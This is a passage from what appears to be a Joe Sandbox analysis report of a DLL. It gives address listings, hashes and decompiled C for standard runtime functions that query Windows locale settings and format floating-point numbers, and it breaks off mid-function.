              0x6da9d57b
              0x6da9d57b
              0x6da9d57b
              0x6da9d89c
              0x6da9d89c
              0x6da9d89e
              0x6da9d917
              0x6da9d91e
              0x6da9d91e
              0x6da9d91e
              0x6da9d925
              0x6da9d927
              0x6da9d92d
              0x6da9d92e
              0x6da9de85
              0x6da9de85
              0x6da9de86
              0x6da9de87
              0x6da9de8c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da9d8a0
              0x6da9d8a6
              0x6da9d8a6
              0x6da9d8ac
              0x6da9d8ac
              0x6da9d8b8
              0x00000000
              0x6da9d8b8
              0x6da9d4c3
              0x6da9de8f
              0x6da9de8f
              0x6da9de95
              0x6da9de9b
              0x6da9dea1
              0x6da9dea3
              0x6da9dea5
              0x6da9deac
              0x6da9deac
              0x6da9deae
              0x6da9deae
              0x6da9deb7
              0x6da9deb8
              0x6da9dec0
              0x6da9dec7
              0x6da9deca
              0x6da9decb
              0x6da9ded1
              0x6da9ded1
              0x6da9ded5
              0x6da9dedb
              0x6da9dedd
              0x6da9dedf
              0x6da9dee5
              0x6da9dee8
              0x6da9def9
              0x6da9defc
              0x6da9df02
              0x6da9df17
              0x6da9df1c
              0x6da9deea
              0x6da9deea
              0x6da9def1
              0x6da9def1
              0x6da9dee8
              0x6da9dedd
              0x6da9df2d
              0x6da9df34
              0x6da9df3c
              0x6da9df3d
              0x6da9df3f
              0x6da9e0a9
              0x6da9e0ab
              0x6da9e0bb
              0x6da9e0be
              0x6da9e0c0
              0x00000000
              0x6da9e0ad
              0x6da9e0b3
              0x00000000
              0x6da9e0b3
              0x00000000
              0x6da9df45
              0x6da9df45
              0x6da9df4b
              0x6da9df4e
              0x6da9df54
              0x6da9df57
              0x6da9df5d
              0x6da9df63
              0x6da9df65
              0x6da9df67
              0x6da9df69
              0x6da9df69
              0x6da9df6b
              0x6da9df6b
              0x6da9df78
              0x6da9df7f
              0x6da9df82
              0x6da9df83
              0x6da9df85
              0x6da9df86
              0x6da9df86
              0x6da9df8e
              0x6da9df94
              0x6da9df96
              0x6da9df9c
              0x6da9df9e
              0x6da9dfa4
              0x6da9dfa7
              0x6da9e081
              0x6da9e087
              0x6da9e09c
              0x6da9e0a1
              0x6da9dfad
              0x6da9dfb3
              0x6da9dfba
              0x6da9dfba
              0x6da9dfba
              0x6da9dfba
              0x6da9dfa7
              0x6da9dfc0
              0x6da9dfc0
              0x6da9dfc6
              0x6da9dfc6
              0x6da9dfc6
              0x6da9dfcc
              0x6da9dfd2
              0x6da9dfd5
              0x6da9dfdb
              0x6da9dfdd
              0x6da9dfdf
              0x6da9dfe5
              0x6da9dfe7
              0x6da9dfeb
              0x6da9dfed
              0x6da9dfed
              0x6da9dfed
              0x6da9dfeb
              0x6da9dfe5
              0x6da9dff2
              0x6da9dff3
              0x6da9dff5
              0x6da9dff7
              0x6da9dff7
              0x6da9dff9
              0x6da9dffb
              0x6da9dffd
              0x6da9e003
              0x6da9e009
              0x6da9e00b
              0x6da9e011
              0x6da9e011
              0x6da9e017
              0x6da9e01d
              0x6da9e01f
              0x00000000
              0x00000000
              0x6da9e025
              0x6da9e027
              0x6da9e027
              0x6da9e029
              0x6da9e029
              0x6da9e035
              0x6da9e039
              0x6da9e040
              0x6da9e043
              0x6da9e044
              0x6da9e046
              0x6da9e046
              0x6da9e04e
              0x6da9e054
              0x6da9e056
              0x6da9e05c
              0x6da9e062
              0x6da9e068
              0x6da9e06b
              0x6da9e0cb
              0x6da9e0ce
              0x6da9e0d4
              0x6da9e0e9
              0x6da9e0ee
              0x6da9e06d
              0x6da9e06f
              0x6da9e076
              0x6da9e076
              0x6da9e06b
              0x6da9e0ff
              0x6da9e10c
              0x6da9e116
              0x6da9e116
              0x6da9e118
              0x6da9e120
              0x6da9e126
              0x6da9e129
              0x6da9e12f
              0x6da9e131
              0x6da9e142
              0x00000000
              0x6da9e133
              0x6da9e133
              0x6da9e136
              0x6da9e145
              0x6da9e145
              0x6da9e138
              0x6da9e138
              0x6da9e13a
              0x6da9e13a
              0x6da9e136
              0x6da9e14b
              0x6da9e14c
              0x6da9e152
              0x6da9e155
              0x6da9e155
              0x6da9e15d
              0x6da9e160
              0x6da9e164
              0x6da9e164
              0x6da9e165
              0x6da9e167
              0x6da9e16d
              0x6da9e173
              0x00000000
              0x00000000
              0x00000000
              0x6da9e173
              0x6da9e011
              0x6da9e179
              0x6da9e179
              0x6da9e17c
              0x6da9e183
              0x00000000
              0x6da9e185
              0x6da9e185
              0x6da9e187
              0x00000000
              0x00000000
              0x6da9e187
              0x00000000
              0x6da9cd6e
              0x6da9cd6e
              0x6da9cd74
              0x6da9cd77
              0x6da9cd77
              0x6da9cd7a
              0x6da9cdca
              0x6da9cdd2
              0x6da9cdd4
              0x00000000
              0x6da9cdda
              0x6da9e189
              0x6da9e189
              0x6da9e189
              0x00000000
              0x6da9e189
              0x6da9cd7c
              0x6da9cd7c
              0x6da9cd7c
              0x6da9cd7f
              0x6da9cd99
              0x00000000
              0x6da9cd81
              0x6da9cd81
              0x6da9cd81
              0x6da9cd84
              0x6da9cd92
              0x00000000
              0x6da9cd86
              0x6da9cd86
              0x6da9cd89
              0x00000000
              0x6da9cd8b
              0x6da9cd8b
              0x00000000
              0x6da9cd8b
              0x6da9cd89
              0x6da9cd84
              0x6da9cd7f
              0x6da9cd7a
              0x6da9cd34
              0x6da9cd39
              0x6da9cd41
              0x6da9cd55
              0x6da9cd5a
              0x6da9cd9e
              0x6da9cd9e
              0x6da9cda1
              0x6da9cdb1
              0x6da9e1b2
              0x6da9e1b4
              0x6da9e1b5
              0x6da9e1b6
              0x6da9e1b7
              0x6da9e1b8
              0x6da9e1b9
              0x6da9e1be
              0x6da9e1c1
              0x6da9e1c4
              0x6da9e1c7
              0x6da9e1c9
              0x6da9e1da
              0x6da9e1dd
              0x6da9e1df
              0x6da9e1e5
              0x6da9e1eb
              0x6da9e1f1
              0x6da9e1f2
              0x6da9e1f3
              0x6da9e1f9
              0x6da9e202
              0x6da9e208
              0x6da9e220
              0x6da9e226
              0x00000000
              0x6da9e228
              0x6da9e228
              0x6da9e22e
              0x00000000
              0x6da9e230
              0x6da9e230
              0x6da9e232
              0x00000000
              0x6da9e232
              0x6da9e22e
              0x6da9e20a
              0x6da9e20a
              0x6da9e210
              0x6da9e21a
              0x6da9e21a
              0x6da9e21c
              0x6da9e234
              0x6da9e234
              0x00000000
              0x6da9e212
              0x6da9e212
              0x6da9e218
              0x6da9e25e
              0x6da9e264
              0x00000000
              0x00000000
              0x00000000
              0x6da9e218
              0x6da9e210
              0x6da9e1fb
              0x6da9e1fd
              0x6da9e235
              0x6da9e235
              0x6da9e236
              0x6da9e238
              0x6da9e238
              0x6da9e23a
              0x6da9e241
              0x6da9e244
              0x6da9e244
              0x6da9e244
              0x6da9e252
              0x6da9e254
              0x6da9e25b
              0x6da9e26e
              0x6da9e1ed
              0x6da9e1ed
              0x00000000
              0x6da9e1ed
              0x6da9e1e1
              0x6da9e1e1
              0x00000000
              0x6da9e1e1
              0x6da9e1cb
              0x6da9e1cb
              0x6da9e1cb
              0x6da9e1cd
              0x6da9e1cd
              0x6da9e1d0
              0x6da9e1d2
              0x6da9e1d5
              0x6da9e1d7
              0x6da9e1d9
              0x6da9e1d9
              0x6da9cdb7
              0x6da9e18b
              0x6da9e18b
              0x6da9e192
              0x6da9e193
              0x6da9e194
              0x6da9e19d
              0x6da9e1a2
              0x6da9e1aa
              0x6da9e1b1
              0x6da9e1b1
              0x00000000
              0x00000000
              0x00000000
              0x6da9cd41

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: e67f88d44ff431c98a083526c366089bd7772a999efef0b2581b49ad3df07d0e
              • Instruction ID: 74582ce8dc7acc0679e0aa4e62605b5093e09af185833da7a371884e5569ad05
              • Opcode Fuzzy Hash: e67f88d44ff431c98a083526c366089bd7772a999efef0b2581b49ad3df07d0e
              • Instruction Fuzzy Hash: 49D21776E196298FDF658E28CD407EAB7F5EB85344F1445EAD40DAB240E738AAC1CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C73D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 96%
              			E6DA9C73D(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6DA92774(_t27, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















              0x6da9c743
              0x6da9c74a
              0x6da9c7ee
              0x6da9c807
              0x6da9c80d
              0x6da9c812
              0x6da9c814
              0x6da9c814
              0x6da9c81a
              0x6da9c81d
              0x6da9c81d
              0x6da9c809
              0x6da9c809
              0x00000000
              0x6da9c809
              0x6da9c750
              0x6da9c755
              0x00000000
              0x00000000
              0x6da9c75b
              0x6da9c760
              0x6da9c762
              0x6da9c762
              0x6da9c768
              0x00000000
              0x00000000
              0x6da9c76d
              0x6da9c784
              0x6da9c784
              0x6da9c78d
              0x6da9c78f
              0x00000000
              0x00000000
              0x6da9c791
              0x6da9c796
              0x6da9c798
              0x6da9c798
              0x6da9c79e
              0x00000000
              0x00000000
              0x6da9c7a3
              0x6da9c7c1
              0x6da9c7c3
              0x6da9c7e6
              0x00000000
              0x6da9c7eb
              0x6da9c7de
              0x00000000
              0x00000000
              0x6da9c7e0
              0x00000000
              0x6da9c7e0
              0x6da9c7a5
              0x6da9c7ad
              0x00000000
              0x00000000
              0x6da9c7af
              0x6da9c7b2
              0x6da9c7b8
              0x00000000
              0x00000000
              0x00000000
              0x6da9c7ba
              0x6da9c7bc
              0x6da9c7be
              0x00000000
              0x6da9c7be
              0x6da9c76f
              0x6da9c777
              0x00000000
              0x00000000
              0x6da9c779
              0x6da9c77c
              0x6da9c782
              0x00000000
              0x00000000
              0x00000000
              0x6da9c782
              0x6da9c788
              0x6da9c78a
              0x00000000

              APIs
              • GetLocaleInfoW.KERNEL32(00000000,2000000B,6DA9CA5B,00000002,00000000,?,?,?,6DA9CA5B,?,00000000), ref: 6DA9C7D6
              • GetLocaleInfoW.KERNEL32(00000000,20001004,6DA9CA5B,00000002,00000000,?,?,?,6DA9CA5B,?,00000000), ref: 6DA9C7FF
              • GetACP.KERNEL32(?,?,6DA9CA5B,?,00000000), ref: 6DA9C814
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID: ACP$OCP
              • API String ID: 2299586839-711371036
              • Opcode ID: 65f8e91afbccde69cf97e256e581837170e1186939203c796b38e11e27c7e95b
              • Instruction ID: 83792b95ed9eb925378245d3cc80f659943d758700c7cf6d111bf17917866b1a
              • Opcode Fuzzy Hash: 65f8e91afbccde69cf97e256e581837170e1186939203c796b38e11e27c7e95b
              • Instruction Fuzzy Hash: D621903A66CA02ABE7258F64C940A9772F6BB44B94B1AC524F90ADF100E732DAC0C350
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C912 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 87%
              			E6DA9C912(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				signed short _t48;
				int _t49;
				void* _t53;
				signed short* _t57;
				signed short _t70;
				intOrPtr _t73;
				void* _t75;
				signed short _t76;
				intOrPtr _t83;
				short* _t86;
				signed short _t89;
				signed short* _t99;
				void* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x6dab3014; // 0x6c4e8ceb
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E6DA92BDC(__ecx, __edx, _t101) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6DA92BDC(__ecx, __edx, _t101);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x6daa8574; // 0x17
					E6DA9C8B1(_t89, 0, 0x6daa8460, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					if(_t48 == 0 ||  *_t48 == _t97) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						E6DA9C250(_t89, _t97,  &_v20);
						_pop(_t89);
					}
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0 ||  *_t70 == _t97) {
						E6DA9C336(_t89, _t97,  &_v20);
					} else {
						E6DA9C29B(_t89, _t97,  &_v20);
					}
					_pop(_t89);
					if(_v20 != 0) {
						_t100 = 0;
						goto L25;
					} else {
						_t73 =  *0x6daa845c; // 0x41
						_t75 = E6DA9C8B1(_t89, _t97, 0x6daa8150, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t101 = E6DA9C73D(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t101;
									}
									E6DA96910(_v16,  &(_v24[0x128]), 0x55, _t100);
									if(_t86 == 0) {
										L34:
										_t53 = 1;
										L23:
										return E6DA89B91(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
									} else {
										_t33 =  &(_t86[0x90]); // 0xd0
										E6DA96910(_v16, _t33, 0x55, _t100);
										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t86[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t86[0x80]); // 0xb0
										E6DAA0752(_t38, _t101, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E6DA9C336(_t89, _t97,  &_v20);
						} else {
							E6DA9C29B(_t89, _t97,  &_v20);
						}
						_pop(_t89);
						goto L21;
					}
				}
			}

































              0x6da9c91a
              0x6da9c921
              0x6da9c928
              0x6da9c92c
              0x6da9c930
              0x6da9c93e
              0x6da9c943
              0x6da9c944
              0x6da9c945
              0x6da9c946
              0x6da9c94e
              0x6da9c950
              0x6da9c956
              0x6da9c95c
              0x6da9c95f
              0x6da9c961
              0x6da9c964
              0x6da9c968
              0x6da9c96f
              0x6da9c97c
              0x6da9c981
              0x6da9c984
              0x6da9c987
              0x6da9c987
              0x6da9c989
              0x6da9c98c
              0x6da9c990
              0x6da9ca00
              0x6da9ca04
              0x6da9ca17
              0x6da9ca1e
              0x6da9ca24
              0x6da9ca27
              0x6da9ca0b
              0x6da9ca0f
              0x6da9ca14
              0x6da9ca14
              0x00000000
              0x6da9c997
              0x6da9c997
              0x6da9c99b
              0x6da9c9b1
              0x6da9c9a2
              0x6da9c9a6
              0x6da9c9a6
              0x6da9c9ba
              0x6da9c9bb
              0x6da9ca43
              0x00000000
              0x6da9c9c1
              0x6da9c9c1
              0x6da9c9d0
              0x6da9c9d5
              0x6da9c9da
              0x6da9ca2a
              0x6da9ca2a
              0x6da9ca2c
              0x6da9ca30
              0x6da9ca45
              0x6da9ca51
              0x6da9ca5b
              0x6da9ca61
              0x00000000
              0x6da9ca80
              0x6da9ca80
              0x6da9ca85
              0x6da9ca87
              0x6da9ca87
              0x6da9ca98
              0x6da9ca9f
              0x6da9caff
              0x6da9cb01
              0x6da9ca34
              0x6da9ca42
              0x6da9caa1
              0x6da9caa4
              0x6da9caae
              0x6da9cac6
              0x00000000
              0x00000000
              0x6da9cace
              0x6da9cae5
              0x00000000
              0x00000000
              0x6da9caef
              0x6da9caf7
              0x00000000
              0x6da9cafc
              0x6da9ca9f
              0x6da9ca61
              0x6da9ca32
              0x6da9ca32
              0x00000000
              0x6da9ca32
              0x6da9c9dc
              0x6da9c9de
              0x6da9c9e2
              0x6da9c9f8
              0x6da9c9e9
              0x6da9c9ed
              0x6da9c9ed
              0x6da9c9fd
              0x00000000
              0x6da9c9fd
              0x6da9c9bb

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6DA9CA1E
              • IsValidCodePage.KERNEL32(00000000), ref: 6DA9CA67
              • IsValidLocale.KERNEL32(?,00000001), ref: 6DA9CA76
              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6DA9CABE
              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6DA9CADD
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
              • String ID:
              • API String ID: 415426439-0
              • Opcode ID: 88a06d7284efc3732c150337697f4fdcc3dd615c8dbda605e7eaae20e9e64438
              • Instruction ID: 602d325dffe0d5b1bb08acc016771ec53985b93acf8d0031619129ca58d17666
              • Opcode Fuzzy Hash: 88a06d7284efc3732c150337697f4fdcc3dd615c8dbda605e7eaae20e9e64438
              • Instruction Fuzzy Hash: 52515075928A16AFEB00DFB5CC40ABE77F9BF09700F094529E510EF140EB70DA818B61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA948FC Relevance: 6.3, APIs: 4, Instructions: 337COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 82%
              			E6DA948FC(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t87;
				void* _t93;
				intOrPtr _t94;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t115;
				void* _t118;
				void* _t120;
				void* _t122;
				signed int* _t124;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int* _t140;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t161;
				unsigned int _t162;
				intOrPtr _t171;
				signed int _t173;
				signed int* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				intOrPtr _t189;
				void* _t190;

				_t186 = _a24;
				if(_t186 < 0) {
					_t186 = 0;
				}
				_t183 = _a8;
				_t3 = _t186 + 0xb; // 0xb
				 *_t183 = 0;
				if(_a12 > _t3) {
					_t140 = _a4;
					_t147 = _t140[1];
					_t173 =  *_t140;
					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if(__eflags != 0) {
						__eflags = _t147;
						if(__eflags > 0) {
							L13:
							_t20 = _t183 + 1; // 0x2
							_t174 = _t20;
							_t87 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t87;
							_v16 = _t174;
							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
							__eflags = _t147 & 0x7ff00000;
							_t93 = 0x30;
							if((_t147 & 0x7ff00000) != 0) {
								 *_t183 = 0x31;
								L18:
								_t149 = 0;
								__eflags = 0;
								L19:
								_t28 =  &(_t174[0]); // 0x2
								_t184 = _t28;
								__eflags = _t186;
								if(_t186 != 0) {
									_t94 = _a40;
									__eflags =  *((char*)(_t94 + 0x14));
									if(__eflags == 0) {
										E6DA8F860(_t94, _t174, __eflags);
										_t94 = _a40;
										_t174 = _v16;
									}
									_t149 = 0;
									__eflags = 0;
									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
								} else {
									_t98 = _t149;
								}
								 *_t174 = _t98;
								_t100 = _t140[1] & 0x000fffff;
								__eflags = _t100;
								_v40 = _t100;
								if(_t100 > 0) {
									L26:
									_t175 = _t149;
									_t150 = 0xf0000;
									_t101 = 0x30;
									_v12 = _t101;
									_v24 = _t149;
									_v28 = 0xf0000;
									while(1) {
										_v32 = _v12 & 0x0000ffff;
										_t104 = _t184;
										_v36 = _t184;
										_v40 = _t186;
										__eflags = _t186;
										if(__eflags <= 0) {
											break;
										}
										_t127 = E6DAA1EF0( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
										_t161 = 0x30;
										_t129 = _t127 + _t161 & 0x0000ffff;
										__eflags = _t129 - 0x39;
										if(_t129 > 0x39) {
											_t129 = _t129 + _v48;
											__eflags = _t129;
										}
										_t162 = _v28;
										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
										 *_t184 = _t129;
										_t184 = _t184 + 1;
										_t150 = _t162 >> 4;
										_t131 = _v12 - 4;
										_t186 = _t186 - 1;
										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
										_v28 = _t162 >> 4;
										_v12 = _t131;
										__eflags = _t131;
										if(_t131 >= 0) {
											continue;
										} else {
											goto L43;
										}
									}
									_t186 = _v40;
									_t184 = _t104;
									_t105 = E6DA9512D(__eflags, _t140, _t175, _t150, _v32, _a36);
									_t190 = _t190 + 0x14;
									__eflags = _t105;
									if(_t105 == 0) {
										goto L43;
									}
									_t184 = _v36;
									_t146 = 0x30;
									_t124 = _t184 - 1;
									while(1) {
										_t156 =  *_t124;
										__eflags = _t156 - 0x66;
										if(_t156 == 0x66) {
											goto L36;
										}
										__eflags = _t156 - 0x46;
										if(_t156 != 0x46) {
											_t140 = _a4;
											__eflags = _t124 - _v16;
											if(_t124 == _v16) {
												_t65 = _t124 - 1;
												 *_t65 =  *(_t124 - 1) + 1;
												__eflags =  *_t65;
											} else {
												__eflags = _t156 - 0x39;
												if(_t156 != 0x39) {
													_t157 = _t156 + 1;
													__eflags = _t157;
												} else {
													_t157 = _v48 + 0x3a;
												}
												 *_t124 = _t157;
											}
											goto L43;
										}
										L36:
										 *_t124 = _t146;
										_t124 = _t124 - 1;
									}
								} else {
									__eflags =  *_t140 - _t149;
									if( *_t140 <= _t149) {
										L43:
										__eflags = _t186;
										if(_t186 > 0) {
											_push(_t186);
											_t122 = 0x30;
											_push(_t122);
											_push(_t184);
											E6DA8B0A0(_t184);
											_t184 = _t184 + _t186;
											__eflags = _t184;
										}
										_t106 = _v16;
										__eflags =  *_t106;
										if( *_t106 == 0) {
											_t184 = _t106;
										}
										 *_t184 = (_v5 << 5) + 0x50;
										_t176 = _t140[1];
										_t111 = E6DAA1EF0( *_t140, 0x34, _t176);
										_t141 = 0;
										_t188 = _t176 & 0;
										_t70 = _t184 + 2; // 0x2
										_t177 = _t70;
										_t154 = (_t111 & 0x000007ff) - _v20;
										__eflags = _t154;
										_v48 = _t177;
										asm("sbb esi, ebx");
										if(__eflags < 0) {
											L51:
											_t154 =  ~_t154;
											asm("adc esi, ebx");
											_t188 =  ~_t188;
											0x2b = 0x2d;
											goto L52;
										} else {
											if(__eflags > 0) {
												L50:
												L52:
												 *(_t184 + 1) = 0x2b;
												_t185 = _t177;
												_t113 = 0x30;
												 *_t177 = _t113;
												__eflags = _t188 - _t141;
												if(__eflags < 0) {
													L61:
													_t178 = 0x30;
													L62:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														L66:
														_t155 = _t154 + _t178;
														__eflags = _t155;
														 *_t185 = _t155;
														 *(_t185 + 1) = _t141;
														L67:
														_t114 = 0;
														__eflags = 0;
														L68:
														return _t114;
													}
													if(__eflags > 0) {
														L65:
														_push(_t141);
														_push(_t141);
														_push(0xa);
														_push(_t188);
														_push(_t154);
														_t115 = E6DAA1F10();
														_v48 = _t178;
														_t178 = 0x30;
														 *_t185 = _t115 + _t178;
														_t185 = _t185 + 1;
														_t141 = 0;
														__eflags = 0;
														goto L66;
													}
													__eflags = _t154 - 0xa;
													if(_t154 < 0xa) {
														goto L66;
													}
													goto L65;
												}
												if(__eflags > 0) {
													L55:
													_push(_t141);
													_push(_t141);
													_push(0x3e8);
													_push(_t188);
													_push(_t154);
													_t118 = E6DAA1F10();
													_t188 = _t141;
